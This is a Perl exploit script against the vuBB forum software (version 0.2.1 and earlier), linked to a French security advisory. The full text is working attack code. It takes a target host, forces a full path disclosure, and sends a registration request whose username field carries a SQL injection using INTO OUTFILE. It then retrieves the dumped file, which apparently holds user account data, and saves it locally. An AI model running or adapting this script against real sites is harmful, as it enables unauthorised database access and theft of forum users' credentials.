#!/usr/bin/perl # # by DarkFig -- acid-root.new.fr # French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt # use IO::Socket; use LWP::Simple; # Header print "\r\n+---------------------------------------+", "\r\n"; print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "\r\n"; print "+---------------------------------------+", "\r\n"; # Usage if(!$ARGV[2]){ print "| Usage: <host> <path> <username> ------|", "\r\n"; print "+---------------------------------------+", "\r\n"; exit; } # Host if($ARGV[0] =~ /http:\/\/(.*)/){ $host = $1; } else { $host = $ARGV[0]; } print "[+]Host: $host\r\n"; # Var my $path = $ARGV[1]; my $user = $ARGV[2]; print "[+]User: $user\r\n"; my $port = 80; my $fpd = "http://".$host.$path."includes/vubb.php"; my $err1 = "[-]Can't connect to the host\r\n"; my $err2 = "[-]Can't retrieve the full path\r\n"; my $err3 = "[-]Can't retrieve the results\r\n"; my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1"; # Full Path Disclosure $req0 = get($fpd) or die print $err1 and end(); if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) { $fullpath = $1."/thisismypasswd.txt"; print "[+]Path: $1\r\n"; } else { print $err2 and end(); } # Malicious data my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on"; my $ldat = length $pdat; my $req1 = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "tcp" ) or print $err1 and end(); print $req1 "$poti", "\r\n"; print $req1 "Host: $host", "\r\n"; print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n"; print $req1 "Content-Length: $ldat", "\r\n\n"; print $req1 "$pdat", "\r\n"; close($req1); # Results $req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end(); open(f, ">VUBB_RESULT.txt"); print f $req2; close(f); print "[+]Done: VUBB_RESULT.txt\r\n"; end(); # Bye sub end { print "+---------------------------------------+", "\r\n"; exit; }